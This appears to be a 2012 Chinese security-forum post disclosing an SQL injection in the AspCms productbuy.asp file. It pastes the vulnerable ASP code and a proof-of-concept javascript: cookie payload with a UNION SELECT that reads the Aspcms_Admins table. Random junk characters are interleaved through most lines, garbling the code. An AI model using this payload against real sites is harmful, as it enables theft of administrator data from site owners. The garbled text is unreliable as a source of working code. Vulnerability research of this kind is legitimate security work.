好久没上土司了,上来一看发现在删号名单内.....
/ h6 V: @7 L: }, l; e也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。* d' x$ y8 h5 }/ N9 i ^
废话不多说,看代码:
3 V7 B% y3 R# L+ S
9 r+ \4 @8 s$ ?6 P1 W* s! X<%
4 P( ^7 v: b" ~3 z& t
& V% j/ b$ g8 K+ p+ I' u3 xif action = "buy" then
) c) s9 g0 J9 w( Y) s
% K- s; i+ W s+ i: _. _ addOrder()# H% [! J; r" L5 u
& n% R) e/ D: K' Q
else
0 a; }& ?7 C. @" r2 I# \' c6 }0 u( @/ I5 W2 P8 N# A ^
echoContent()
' z/ p2 N# X+ s3 m
+ u% L1 h5 K) N% R& |& eend if
# X; q! h" r1 d$ I8 ~" C) M9 | m% [) Z2 I- J
M) Q0 m, m) F- L, |
; J6 Q7 w7 ~3 j……略过
( k9 }4 |+ a9 z% W2 p+ f D/ j8 T1 R; ^6 L1 d
/ f" V, U- P2 a; ]8 _2 y: v; j4 S; ~
( a3 b7 T* s& D) V! ~/ bSub echoContent()# @- e) f( z3 u
4 X. R" y( g5 U! k7 g( W4 G
dim id
9 J+ x" o( S3 p- _6 {* y5 F- H2 x
& k; P( J7 y4 [# {/ j# N: a, F# ^, e id=getForm("id","get")
% G8 m s1 N3 Y
" ^+ @( E& f7 d, F
; e1 B. G8 K9 N- B* ^$ [8 d, ?+ Y$ ^
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
# E6 h% [" Y* g0 P* A! {* _$ b' h6 @6 I6 Q; ?" n/ M2 \
% V" `& e3 n8 O. m! u3 r/ ? @5 C( R" \+ z
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
+ }+ ^+ Q+ W& X- ~- _
) [9 [4 S$ c0 L1 c, j dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct- A8 N+ l' z4 H# a6 N7 `- l
8 r( \* S0 Y( O) c4 s" K, d Dim templatePath,tempStr
! p9 E, E/ T* }" v1 i7 V w- T) w; B K4 i- ]0 Q" R/ P
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"; o2 _1 D( @$ I, N+ e: M# B
! {/ I; |7 J% z+ c- B
( K5 A- f! B. f( K$ F. `. ]: n
. @! {5 E$ e7 G* {
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1") o3 y! N" i) k/ ?
/ b- \! C* d, ~6 G& X" p3 v/ r# ^
selectproduct=rsObj(0)
- p6 W/ z `! x4 u/ }% k; L" ]: C7 N5 a/ B$ Z+ T& m$ `# j: d
! a! n6 p9 u& E8 ]) Q ?6 {
( i% q' y+ z9 m5 r+ y
Dim linkman,gender,phone,mobile,email,qq,address,postcode
5 m& T% q6 p g0 K, r( n1 R7 Z
) N6 j$ I: U# B3 S% I) c5 l if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
/ n! J, v# W+ S% D) j" s9 m6 T! T! H, P+ W0 x* k5 ~$ Y
if rCookie("loginstatus")=1 then + ^. t2 g! D* }; B6 J
- H8 c# h; Z6 H, `, K% k/ o set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
2 L* i7 H, R" t" h3 j9 F" |+ ~' X& q" Q7 `0 t3 [# J
linkman=rsObj("truename")
* _( D* k6 B$ u4 m H( H( h8 r
- v2 `, z& A- ~1 C gender=rsObj("gender")9 e8 t0 I c2 j1 p) E
, U8 ~* D$ L% i) l* }3 h
phone=rsObj("phone")
1 c1 i p- m$ N+ S% M0 A
l+ f) V" K- Z" u+ `% _ mobile=rsObj("mobile")0 j: t8 |- t1 _7 ?: ~* G$ g
7 ?: x1 W* E. c& [( K/ z
email=rsObj("email")
3 U! U$ V" S, b- J- C0 U% I
3 S3 B- [0 L7 y- ^ qq=rsObj("qq")
} }6 m9 Y3 z( E8 d9 u: i) f+ N* O. O5 ~ y6 A% j, H$ U) R- y
address=rsObj("address")
& x4 L- I) B5 w
) J9 H, T6 }! o" o! T postcode=rsObj("postcode")
m8 X. W. F4 e C! |& e( w8 _4 t9 [# `5 v( v1 `* Q4 ?* g
else
# }: W* v+ w$ M2 I1 T+ P5 ^- h4 X% Q- c, h& ]9 }% U
gender=1
2 Q' `% v+ j, @, T* ?& @
) k! j) r, b& o0 a end if; _$ t. X( |: i2 _, i+ V( B) Q
4 T) S5 ~6 W- @& _' X: `
rsObj.close()
; a. D5 L% ?/ h1 i! V L Z2 a7 O, S# N3 g& O$ \1 ]
7 U) B7 {* p1 ]9 A- B3 K4 B- l! E
/ U% z+ w& g5 F4 S/ v( B2 k( C with templateObj
; O* Y. e0 Q0 y5 W- o! @+ y G' Z, z9 ^% Z) ]! b5 r- W
.content=loadFile(templatePath)
% u+ d% s, H3 ?2 h v. r6 ]& `8 c" W
.parseHtml()
* q6 m) G- H8 i- j t
" s6 |" Y( a8 _& e n8 y9 a6 X .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
y/ T" T7 M$ f1 W# M, `
0 Y! e0 `, y j% U. A4 I .content=replaceStr(.content,"[aspcms:linkman]",linkman)
2 B- w* I# ]/ T; r( x: L7 q7 Q. H0 o4 h' h, O
.content=replaceStr(.content,"[aspcms:gender]",gender) B/ @5 b4 m8 y/ f
2 d2 |# N. q, B5 q. m; \ .content=replaceStr(.content,"[aspcms:phone]",phone)
! r- {8 }, H: S- G6 K- U
+ G) f7 g+ q; o) R9 | .content=replaceStr(.content,"[aspcms:mobile]",mobile)
7 I4 w9 V1 _7 s8 F2 D7 { Q+ y7 b4 h9 @+ S
.content=replaceStr(.content,"[aspcms:email]",email)
8 v8 e3 E9 r6 q: N: }. h
# j! I& H$ b8 x/ L- a .content=replaceStr(.content,"[aspcms:qq]",qq) + T3 i# D$ N0 ]
, a% x1 s8 P% G8 b+ f- g+ v .content=replaceStr(.content,"[aspcms:address]",address) 8 X1 R( M0 r, J* [& c* Y6 O3 v7 f
O( G# H) }1 `4 `3 }. F6 Y .content=replaceStr(.content,"[aspcms:postcode]",postcode) ) ^3 J2 n1 F9 N
" Q+ w% X1 M4 {1 K* I Y .parseCommon()
& n+ }( }- Y( p- U5 c8 t$ d5 W3 K% }( M& F x* k4 L) t4 ?1 k* \
echo .content . Z! [0 R! U5 k0 D: `# O
! n- K! b& G' b6 y
end with
( i! z3 B; X* P) m7 d T
- i/ r# q& e) K( Y set templateobj =nothing : terminateAllObjects
! m# C" x) |( k' |. Y g1 f8 V1 Q% g
End Sub6 h& o: \2 Z* K0 N% `
漏洞很明显,没啥好说的
4 L6 T* Y9 A* A, z: dpoc:
) E- L, @$ u5 h* ]4 C2 G, r
/ t9 q7 ^3 {! [; T: c; Bjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
3 F. z) o) s, V* j Q- G( _% H; r" e
5 g6 y* A6 }: o" H- F @: I |
发表于 2012-12-27 08:35:05
收藏
支持
反对